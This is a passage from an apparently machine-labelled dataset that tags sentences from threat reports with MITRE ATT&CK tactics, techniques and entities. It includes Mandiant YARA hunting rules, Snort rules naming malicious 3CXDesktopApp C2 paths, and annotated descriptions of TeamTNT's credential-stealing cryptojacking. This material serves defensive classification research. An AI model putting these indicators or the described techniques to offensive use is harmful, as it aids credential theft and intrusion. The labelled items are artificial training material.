34 8E EB 5B 35 37 9A 59 34 8E EB 5B 35 } condition:\nuint16(0) == 0x5A4D and uint32(uint32(0x3C))", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s81-1eb86b", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 81, "context_before": "C8 84 CE 78 BC F4 CA 79 4A 84 CE 78 BC F4 CD 79 4D 84 CE 78 BC F4 CB 79 65 84 CE 78 1F EC CF 79 43 84 CE 78 44 84 CF 78 22 84 CE 78 FC F5 C7 79 42 84 CE 78 FC F5 CE 79 45 84 CE 78 FC F5 CC 79 45 84 CE 78} $rh3 = { DA D2 21 22 9E B3 4F 71 9E B3 4F 71 9E B3 4F 71 C5 DB 4C 70 94 B3 4F 71 C5 DB 4A 70 15 B3 4F 71 C5 DB 4B 70 8C B3 4F 71 66 C3 4B 70 8C B3 4F 71 66 C3 4C 70 8F B3 4F 71 C5 DB 49 70 9F B3 4F 71 66 C3 4A 70 B0 B3 4F 71 C5 DB 4E 70 97 B3 4F 71 9E B3 4E 71 F9 B3 4F 71 26 C2 46 70 9F B3 4F 71 26 C2 B0 71 9F B3 4F 71 9E B3 D8 71 9F B3 4F 71 26 C2 4D 70 9F B3 4F 71 } $rh4 = { CB 8A 35 66 8F EB 5B 35 8F EB 5B 35 8F EB 5B 35 D4 83 5F 34 85 EB 5B 35 D4 83 58 34 8A EB 5B 35 D4 83 5E 34 09 EB 5B 35 77 9B 5E 34 92 EB 5B 35 77 9B 5F 34 81 EB 5B 35 77 9B 58 34 86 EB 5B 35 D4 83 5A 34 8C EB 5B 35 8F EB 5A 35 D3 EB 5B 35 37 9A 52 34 8C EB 5B 35 37 9A 58 34 8E EB 5B 35 37 9A 5B 34 8E EB 5B 35 37 9A 59 34 8E EB 5B 35 } condition:\nuint16(0) == 0x5A4D and uint32(uint32(0x3C))", "sentence_text": "== 0x00004550 and 1 of ($rh*)\n}\nrule M_Hunting_VEILEDSIGNAL_2\n{\nmeta:\nauthor = \"Mandiant\" disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment\" md5 = \"404b09def6054a281b41d309d809a428\" strings:\n$sb1 = { C1 E0 05 4D 8?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s82-d8b02b", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 82, "context_before": "== 0x00004550 and 1 of ($rh*)\n}\nrule M_Hunting_VEILEDSIGNAL_2\n{\nmeta:\nauthor = \"Mandiant\" disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment\" md5 = \"404b09def6054a281b41d309d809a428\" strings:\n$sb1 = { C1 E0 05 4D 8?", "sentence_text": "[2] 33 D0 45 69 C0 7D 50 BF 12 8B C2 41 FF C2 C1 E8 07 33 D0 8B C2 C1 E0 16 41 81 C0 87 D6 12 00 } $si1 = \"CryptBinaryToStringA\" fullword $si2 = \"BCryptGenerateSymmetricKey\" fullword $si3 = \"CreateThread\" fullword $ss1 = \"ChainingModeGCM\" wide $ss2 = \"__tutma\" fullword condition:\n(uint16(0) == 0x5A4D) and (uint32(uint32(0x3C))", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s83-517cba", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 83, "context_before": "[2] 33 D0 45 69 C0 7D 50 BF 12 8B C2 41 FF C2 C1 E8 07 33 D0 8B C2 C1 E0 16 41 81 C0 87 D6 12 00 } $si1 = \"CryptBinaryToStringA\" fullword $si2 = \"BCryptGenerateSymmetricKey\" fullword $si3 = \"CreateThread\" fullword $ss1 = \"ChainingModeGCM\" wide $ss2 = \"__tutma\" fullword condition:\n(uint16(0) == 0x5A4D) and (uint32(uint32(0x3C))", "sentence_text": "== 0x00004550) and (uint16(uint32(0x3C)+0x18) == 0x020B) and all of them } rule M_Hunting_VEILEDSIGNAL_3 { meta:\nauthor = \"Mandiant\" disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment\" md5 = \"c6441c961dcad0fe127514a918eaabd4\" strings:\n$ss1 = { 61 70 70 6C 69 63 61 74 69 6F 6E 2F 6A 73 6F 6E 2C 20 74 65 78 74 2F 6A 61 76 61 73 63 72 69 70 74 2C 20 2A 2F 2A 3B 20 71 3D 30 2E 30 31 00 00", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s84-ab0d75", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 84, "context_before": "== 0x00004550) and (uint16(uint32(0x3C)+0x18) == 0x020B) and all of them } rule M_Hunting_VEILEDSIGNAL_3 { meta:\nauthor = \"Mandiant\" disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment\" md5 = \"c6441c961dcad0fe127514a918eaabd4\" strings:\n$ss1 = { 61 70 70 6C 69 63 61 74 69 6F 6E 2F 6A 73 6F 6E 2C 20 74 65 78 74 2F 6A 61 76 61 73 63 72 69 70 74 2C 20 2A 2F 2A 3B 20 71 3D 30 2E 30 31 00 00", "sentence_text": "61 63 63 65 70 74 00 00 65 6E 2D 55 53 2C 65 6E 3B 71 3D 30 2E 39 00 00 61 63 63 65 70 74 2D 6C 61 6E 67 75 61 67 65 00 63 6F 6F 6B 69 65 00 00 } $si1 = \"HttpSendRequestW\" fullword $si2 = \"CreateNamedPipeW\" fullword $si3 = \"CreateThread\" fullword $se1 = \"DllGetClassObject\" fullword condition:\n(uint16(0) == 0x5A4D) and (uint32(uint32(0x3C))", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s85-1105b3", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 85, "context_before": "61 63 63 65 70 74 00 00 65 6E 2D 55 53 2C 65 6E 3B 71 3D 30 2E 39 00 00 61 63 63 65 70 74 2D 6C 61 6E 67 75 61 67 65 00 63 6F 6F 6B 69 65 00 00 } $si1 = \"HttpSendRequestW\" fullword $si2 = \"CreateNamedPipeW\" fullword $si3 = \"CreateThread\" fullword $se1 = \"DllGetClassObject\" fullword condition:\n(uint16(0) == 0x5A4D) and (uint32(uint32(0x3C))", "sentence_text": "== 0x00004550) and (uint16(uint32(0x3C)+0x18) == 0x020B) and all of them } rule M_Hunting_VEILEDSIGNAL_4 { meta:\nauthor = \"Mandiant\" disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment\" md5 = \"404b09def6054a281b41d309d809a428, c6441c961dcad0fe127514a918eaabd4\" strings:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s88-e662ad", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 88, "context_before": "89 ??", "sentence_text": "[2] FF FF 44 89 74 24 20 33 D2 33 C9 FF 15 } $si1 = \"CreateThread\" fullword $si2 = \"MultiByteToWideChar\" fullword $si3 = \"LocalAlloc\" fullword $se1 = \"DllGetClassObject\" fullword condition:\n(uint16(0) == 0x5A4D) and (uint32(uint32(0x3C))", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s89-e5d451", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 89, "context_before": "[2] FF FF 44 89 74 24 20 33 D2 33 C9 FF 15 } $si1 = \"CreateThread\" fullword $si2 = \"MultiByteToWideChar\" fullword $si3 = \"LocalAlloc\" fullword $se1 = \"DllGetClassObject\" fullword condition:\n(uint16(0) == 0x5A4D) and (uint32(uint32(0x3C))", "sentence_text": "== 0x00004550) and (uint16(uint32(0x3C)+0x18) == 0x020B) and all of them } rule M_Hunting_VEILEDSIGNAL_5 { meta:\nauthor = \"Mandiant\" disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment\" md5 = \"6727284586ecf528240be21bb6e97f88\" strings:\n$sb1 = { 48 8D 15 [4] 48 8D 4C 24 4C E8", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s90-abc4d3", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 90, "context_before": "== 0x00004550) and (uint16(uint32(0x3C)+0x18) == 0x020B) and all of them } rule M_Hunting_VEILEDSIGNAL_5 { meta:\nauthor = \"Mandiant\" disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment\" md5 = \"6727284586ecf528240be21bb6e97f88\" strings:\n$sb1 = { 48 8D 15 [4] 48 8D 4C 24 4C E8", "sentence_text": "48 8D [3] 48 8B CB FF 15 [4] EB } $ss1 = \"chrome.exe\" wide fullword $ss2 = \"firefox.exe\" wide fullword $ss3 = \"msedge.exe\" wide fullword $ss4 = \"\\\\\\\\.\\\\pipe\\\\*\" ascii fullword $ss5 = \"FindFirstFileA\" ascii fullword $ss6 = \"Process32FirstW\" ascii fullword $ss7 = \"RtlAdjustPrivilege\" ascii fullword $ss8 = \"GetCurrentProcess\" ascii fullword $ss9 = \"NtWaitForSingleObject\" ascii fullword condition:\n(uint16(0) == 0x5A4D) and (uint32(uint32(0x3C))", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s91-32a1d0", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 91, "context_before": "48 8D [3] 48 8B CB FF 15 [4] EB } $ss1 = \"chrome.exe\" wide fullword $ss2 = \"firefox.exe\" wide fullword $ss3 = \"msedge.exe\" wide fullword $ss4 = \"\\\\\\\\.\\\\pipe\\\\*\" ascii fullword $ss5 = \"FindFirstFileA\" ascii fullword $ss6 = \"Process32FirstW\" ascii fullword $ss7 = \"RtlAdjustPrivilege\" ascii fullword $ss8 = \"GetCurrentProcess\" ascii fullword $ss9 = \"NtWaitForSingleObject\" ascii fullword condition:\n(uint16(0) == 0x5A4D) and (uint32(uint32(0x3C))", "sentence_text": "== 0x00004550) and (uint16(uint32(0x3C)+0x18) == 0x020B) and all of them } rule M_Hunting_VEILEDSIGNAL_6 { meta:\nauthor = \"Mandiant\" disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment\" md5 = \"00a43d64f9b5187a1e1f922b99b09b77\" strings:\n$ss1 = \"C:\\\\Programdata\\\\\" wide $ss2 = \"devobj.dll\" wide fullword $ss3 = \"msvcr100.dll\" wide fullword $ss4 = \"TpmVscMgrSvr.exe\" wide fullword $ss5 = \"\\\\Microsoft\\\\Windows\\\\TPM\" wide fullword $ss6 = \"CreateFileW\" ascii fullword condition:\n(uint16(0) == 0x5A4D) and (uint32(uint32(0x3C))", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s92-2a958e", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 92, "context_before": "== 0x00004550) and (uint16(uint32(0x3C)+0x18) == 0x020B) and all of them } rule M_Hunting_VEILEDSIGNAL_6 { meta:\nauthor = \"Mandiant\" disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment\" md5 = \"00a43d64f9b5187a1e1f922b99b09b77\" strings:\n$ss1 = \"C:\\\\Programdata\\\\\" wide $ss2 = \"devobj.dll\" wide fullword $ss3 = \"msvcr100.dll\" wide fullword $ss4 = \"TpmVscMgrSvr.exe\" wide fullword $ss5 = \"\\\\Microsoft\\\\Windows\\\\TPM\" wide fullword $ss6 = \"CreateFileW\" ascii fullword condition:\n(uint16(0) == 0x5A4D) and (uint32(uint32(0x3C))", "sentence_text": "== 0x00004550) and (uint16(uint32(0x3C)+0x18) == 0x010B) and all of them } rule MTI_Hunting_POOLRAT { meta:\nauthor = \"Mandiant\" disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment\" description = \"Detects strings found in POOLRAT. \"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s93-aafb46", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 93, "context_before": "== 0x00004550) and (uint16(uint32(0x3C)+0x18) == 0x010B) and all of them } rule MTI_Hunting_POOLRAT { meta:\nauthor = \"Mandiant\" disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment\" description = \"Detects strings found in POOLRAT. \"", "sentence_text": "md5 = \"451c23709ecd5a8461ad060f6346930c\" date = \"10/28/2020\" version = \"1\" strings:\n$str1 = \"name=\\\"uid\\\"%s%s%u%s\" wide ascii $str2 = \"name=\\\"session\\\"%s%s%u%s\" wide ascii $str3 = \"name=\\\"action\\\"%s%s%s%s\" wide ascii $str4 = \"name=\\\"token\\\"%s%s%u%s\" wide ascii $boundary = \"--N9dLfqxHNUUw8qaUPqggVTpX-\" wide ascii nocase condition:\nany of ($str*) or $boundary } rule M_Hunting_FASTREVERSEPROXY { meta:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s94-70e498", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 94, "context_before": "md5 = \"451c23709ecd5a8461ad060f6346930c\" date = \"10/28/2020\" version = \"1\" strings:\n$str1 = \"name=\\\"uid\\\"%s%s%u%s\" wide ascii $str2 = \"name=\\\"session\\\"%s%s%u%s\" wide ascii $str3 = \"name=\\\"action\\\"%s%s%s%s\" wide ascii $str4 = \"name=\\\"token\\\"%s%s%u%s\" wide ascii $boundary = \"--N9dLfqxHNUUw8qaUPqggVTpX-\" wide ascii nocase condition:\nany of ($str*) or $boundary } rule M_Hunting_FASTREVERSEPROXY { meta:", "sentence_text": "author = \"Mandiant\" disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment\" md5 = \"19dbffec4e359a198daf4ffca1ab9165\" strings:\n$ss1 = \"Go build ID:\" fullword $ss2 = \"Go buildinf:\" fullword $ss3 = \"net/http/httputil.(*ReverseProxy).\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s95-b351a7", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 95, "context_before": "author = \"Mandiant\" disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment\" md5 = \"19dbffec4e359a198daf4ffca1ab9165\" strings:\n$ss1 = \"Go build ID:\" fullword $ss2 = \"Go buildinf:\" fullword $ss3 = \"net/http/httputil.(*ReverseProxy).\"", "sentence_text": "ascii $ss4 = \"github.com/fatedier/frp/client\" ascii $ss5 = \"\\\"server_port\\\"\" ascii $ss6 = \"github.com/armon/go-socks5.proxy\" ascii condition:\nuint16(0) == 0x5A4D and uint32(uint32(0x3C))", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s96-c32b87", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 96, "context_before": "ascii $ss4 = \"github.com/fatedier/frp/client\" ascii $ss5 = \"\\\"server_port\\\"\" ascii $ss6 = \"github.com/armon/go-socks5.proxy\" ascii condition:\nuint16(0) == 0x5A4D and uint32(uint32(0x3C))", "sentence_text": "== 0x00004550 and all of them } Snort Rules alert tcp any any -> any any (msg:\"Possible malicious 3CXDesktopApp Identified\"; content:\"raw.githubusercontent.com/IconStorages/images/main/\"; threshold:type limit, track by_src, count 1, seconds 3600; sid: 99999999;)\nalert tcp any any -> any any (msg:\"Possible malicious 3CXDesktopApp Identified\"; content:\"3cx_auth_id=%s\\;3cx_auth_token_content=%s\\;__tutma=true\"; threshold:type limit, track by_src, count 1, seconds 3600; sid: 99999999;)\nalert tcp any any -> any any (msg:\"Possible malicious 3CXDesktopApp Identified\"; content:\"__tutma\"; threshold:type limit, track by_src, count 1, seconds 3600; sid: 99999999;)\nalert tcp any any -> any any (msg:\"Possible malicious 3CXDesktopApp Identified\"; content:\"__tutmc\"; threshold:type limit, track by_src, count 1, seconds 3600; sid: 99999999;)\nOrganizations can validate their security controls using the following actions with Mandiant Security Validation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s97-f2ab9d", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 97, "context_before": "== 0x00004550 and all of them } Snort Rules alert tcp any any -> any any (msg:\"Possible malicious 3CXDesktopApp Identified\"; content:\"raw.githubusercontent.com/IconStorages/images/main/\"; threshold:type limit, track by_src, count 1, seconds 3600; sid: 99999999;)\nalert tcp any any -> any any (msg:\"Possible malicious 3CXDesktopApp Identified\"; content:\"3cx_auth_id=%s\\;3cx_auth_token_content=%s\\;__tutma=true\"; threshold:type limit, track by_src, count 1, seconds 3600; sid: 99999999;)\nalert tcp any any -> any any (msg:\"Possible malicious 3CXDesktopApp Identified\"; content:\"__tutma\"; threshold:type limit, track by_src, count 1, seconds 3600; sid: 99999999;)\nalert tcp any any -> any any (msg:\"Possible malicious 3CXDesktopApp Identified\"; content:\"__tutmc\"; threshold:type limit, track by_src, count 1, seconds 3600; sid: 99999999;)\nOrganizations can validate their security controls using the following actions with Mandiant Security Validation.", "sentence_text": "Posted in\nThreat Intelligence\nRelated articles\nThreat Intelligence\nGTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools By Google Threat Intelligence Group • 30-minute read Threat Intelligence Preparing for Threats to Come: Cybersecurity Forecast 2026 By Adam Greenberg • 4-minute read Threat Intelligence Keys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant • 39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s98-64f3a4", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 98, "context_before": "Posted in\nThreat Intelligence\nRelated articles\nThreat Intelligence\nGTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools By Google Threat Intelligence Group • 30-minute read Threat Intelligence Preparing for Threats to Come: Cybersecurity Forecast 2026 By Adam Greenberg • 4-minute read Threat Intelligence Keys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant • 39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "sentence_text": "Posting Campaigns to Deliver Malware and Steal Credentials By Google Threat Intelligence Group • 6-minute read [FILTERED_TABLES_START]\n2023-03-22 | apollo-crypto.org.shilaerc20[.]com | UNC4469", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s99-a90c3e", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 99, "context_before": "Posting Campaigns to Deliver Malware and Steal Credentials By Google Threat Intelligence Group • 6-minute read [FILTERED_TABLES_START]\n2023-03-22 | apollo-crypto.org.shilaerc20[.]com | UNC4469", "sentence_text": "A106-319 | Command and Control - UNC4736, DNS Query, Variant #1 A106-321 | Command and Control - UNC4736, DNS Query, Variant #2 A106-323 | Command and Control - UNC4736, DNS Query, Variant #3", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s1-13e5fd", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "Black-T: New Cryptojacking Variant from TeamTNT Threat Research Center Threat Research Cloud Cybersecurity Research Cloud Cybersecurity Research Black-T: New Cryptojacking Variant from TeamTNT min read Related Products Next-Generation Firewall Prisma Cloud By:\nNathaniel Quist", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s2-8acf27", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 2, "context_before": "Black-T: New Cryptojacking Variant from TeamTNT Threat Research Center Threat Research Cloud Cybersecurity Research Cloud Cybersecurity Research Black-T: New Cryptojacking Variant from TeamTNT min read Related Products Next-Generation Firewall Prisma Cloud By:\nNathaniel Quist", "sentence_text": "Published:\nOctober 5, 2020 Categories:\nCloud Cybersecurity Research Threat Research Tags:\nAWS credential stealing Cryptojacking Exposed Docker Daemon API Memory password scraping TeamTnT Share Executive Summary TeamTNT , a group known to target AWS credential files on compromised cloud systems and mine for Monero (XMR).", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1552.001", "name": "Credentials In Files" }, { "id": "T1496", "name": "Resource Hijacking" } ], "procedure": "Targets AWS credential files and mines for Monero", "entities": [ { "text": "TeamTNT ", "start": 211, "end": 219, "label": "ThreatActor" }, { "text": "AWS credential files", "start": 245, "end": 265, "label": "Infrastructure_Indicator" }, { "text": "mine", "start": 299, "end": 303, "label": "Action" }, { "text": "target", "start": 238, "end": 244, "label": "Action" }, { "text": "Monero (XMR)", "start": 308, "end": 320, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-76_mitre_report-p1-s3-a5a330", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 3, "context_before": "Published:\nOctober 5, 2020 Categories:\nCloud Cybersecurity Research Threat Research Tags:\nAWS credential stealing Cryptojacking Exposed Docker Daemon API Memory password scraping TeamTnT Share Executive Summary TeamTNT , a group known to target AWS credential files on compromised cloud systems and mine for Monero (XMR).", "sentence_text": "Black-T follows the traditional TeamTNT tactics, techniques and procedures (TTPs) of targeting exposed Docker daemon APIs and performing scanning and cryptojacking operations on vulnerable systems of affected organizations.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0007", "name": "Discovery" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" }, { "id": "T1046", "name": "Network Service Discovery" } ], "procedure": "Targets exposed Docker daemon APIs and performs scanning and cryptojacking", "entities": [ { "text": "Black-T", "start": 0, "end": 7, "label": "MalwareTool" }, { "text": "TeamTNT", "start": 32, "end": 39, "label": "ThreatActor" }, { "text": "exposed Docker daemon APIs", "start": 95, "end": 121, "label": "Infrastructure_Indicator" }, { "text": "vulnerable systems", "start": 178, "end": 196, "label": "Infrastructure_Indicator" }, { "text": "performing scanning", "start": 126, "end": 145, "label": "Action" }, { "text": "targeting", "start": 85, "end": 94, "label": "Action" }, { "text": "cryptojacking", "start": 150, "end": 163, "label": "Action" } ] }, { "uid": "mitre-76_mitre_report-p1-s4-12ff96", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 4, "context_before": "Black-T follows the traditional TeamTNT tactics, techniques and procedures (TTPs) of targeting exposed Docker daemon APIs and performing scanning and cryptojacking operations on vulnerable systems of affected organizations.", "sentence_text": "However, code within the Black-T malware sample gives evidence of a shift in TTPs for TeamTNT operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s5-cbf18e", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 5, "context_before": "However, code within the Black-T malware sample gives evidence of a shift in TTPs for TeamTNT operations.", "sentence_text": "Any identified passwords which were obtained through mimipenguins are then exfiltrated to a TeamTNT command and control (C2) node.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" }, { "id": "T1003", "name": "OS Credential Dumping" } ], "procedure": "Exfiltrates passwords obtained through mimipenguins to C2 node", "entities": [ { "text": "TeamTNT ", "start": 92, "end": 100, "label": "ThreatActor" }, { "text": "mimipenguins ", "start": 53, "end": 66, "label": "MalwareTool" }, { "text": "(C2) node", "start": 120, "end": 129, "label": "Infrastructure_Indicator" }, { "text": "exfiltrated ", "start": 75, "end": 87, "label": "Action" }, { "text": "obtained ", "start": 36, "end": 45, "label": "Action" } ] }, { "uid": "mitre-76_mitre_report-p1-s6-7d7fb8", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 6, "context_before": "Any identified passwords which were obtained through mimipenguins are then exfiltrated to a TeamTNT command and control (C2) node.", "sentence_text": "This is the first time TeamTNT actors have been witnessed including this type of post-exploitation operation in their TTPs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s7-5bd8e8", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 7, "context_before": "This is the first time TeamTNT actors have been witnessed including this type of post-exploitation operation in their TTPs.", "sentence_text": "The Black-T tool also has the capability to use three different network scanning tools to identify additional exposed Docker daemon APIs, within the local network of the compromised system and across any number of publicly accessible networks, to extend their cryptojacking operations.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" }, { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1046", "name": "Network Service Discovery" } ], "procedure": "Uses network scanning tools to identify exposed Docker daemon APIs", "entities": [ { "text": "Black-T tool", "start": 4, "end": 16, "label": "MalwareTool" }, { "text": "Docker daemon APIs", "start": 118, "end": 136, "label": "Infrastructure_Indicator" }, { "text": "local network ", "start": 149, "end": 163, "label": "Infrastructure_Indicator" }, { "text": "publicly accessible networks", "start": 214, "end": 242, "label": "Infrastructure_Indicator" }, { "text": "network scanning", "start": 64, "end": 80, "label": "Action" }, { "text": " identify ", "start": 89, "end": 99, "label": "Action" }, { "text": "extend ", "start": 247, "end": 254, "label": "Action" } ] }, { "uid": "mitre-76_mitre_report-p1-s8-180b36", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 8, "context_before": "The Black-T tool also has the capability to use three different network scanning tools to identify additional exposed Docker daemon APIs, within the local network of the compromised system and across any number of publicly accessible networks, to extend their cryptojacking operations.", "sentence_text": "Both masscan and pnscan have been used before by TeamTNT actors.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1046", "name": "Network Service Discovery" } ], "procedure": "Used masscan and pnscan network scanning tools", "entities": [ { "text": "masscan ", "start": 5, "end": 13, "label": "MalwareTool" }, { "text": "pnscan ", "start": 17, "end": 24, "label": "MalwareTool" }, { "text": "TeamTNT ", "start": 49, "end": 57, "label": "ThreatActor" }, { "text": "used ", "start": 34, "end": 39, "label": "Action" } ] }, { "uid": "mitre-76_mitre_report-p1-s9-01b3f6", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 9, "context_before": "Both masscan and pnscan have been used before by TeamTNT actors.", "sentence_text": "There was also an update to the masscan network scanner operation to include searching for TCP port 5555.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1046", "name": "Network Service Discovery" } ], "procedure": "Updated masscan to search for TCP port 5555", "entities": [ { "text": "masscan ", "start": 32, "end": 40, "label": "MalwareTool" }, { "text": "TCP port 5555", "start": 91, "end": 104, "label": "Infrastructure_Indicator" }, { "text": "searching ", "start": 77, "end": 87, "label": "Action" } ] }, { "uid": "mitre-76_mitre_report-p1-s10-e1685d", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 10, "context_before": "There was also an update to the masscan network scanner operation to include searching for TCP port 5555.", "sentence_text": "While the exact purpose regarding adding port 5555 to the scanner is unknown, there have been documented cases where XMR cryptojacking is occurring on Android-based devices.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s11-edfe57", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 11, "context_before": "While the exact purpose regarding adding port 5555 to the scanner is unknown, there have been documented cases where XMR cryptojacking is occurring on Android-based devices.", "sentence_text": "This could indicate a new unknown target set for expanding TeamTNT cryptojacking operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s12-69c434", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 12, "context_before": "This could indicate a new unknown target set for expanding TeamTNT cryptojacking operations.", "sentence_text": "However, there is little evidence to support TeamTNT targeting Android devices.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s13-728f75", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 13, "context_before": "However, there is little evidence to support TeamTNT targeting Android devices.", "sentence_text": "verbose mode ist nur für euch 😉 damit ihr was zum gucken habt in der sandbox :-* which translates to “ verbose mode is only for you 😉 so that you have something to watch in the sandbox .”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s14-4d2d50", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 14, "context_before": "verbose mode ist nur für euch 😉 damit ihr was zum gucken habt in der sandbox :-* which translates to “ verbose mode is only for you 😉 so that you have something to watch in the sandbox .”", "sentence_text": "There have been several other cases where German phrases have been used within TeamTNT scripts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s15-8921cb", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 15, "context_before": "There have been several other cases where German phrases have been used within TeamTNT scripts.", "sentence_text": "Prisma Cloud\ncan assist in securing cloud deployments against the threats posed by TeamTNT, by guiding organizations to better detect vulnerabilities or misconfigurations in cloud environment settings and infrastructure as code (IaC) templates prior to deploying production systems.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s16-c3a453", "source": "mitre", "doc_id": "76_mitre_report", 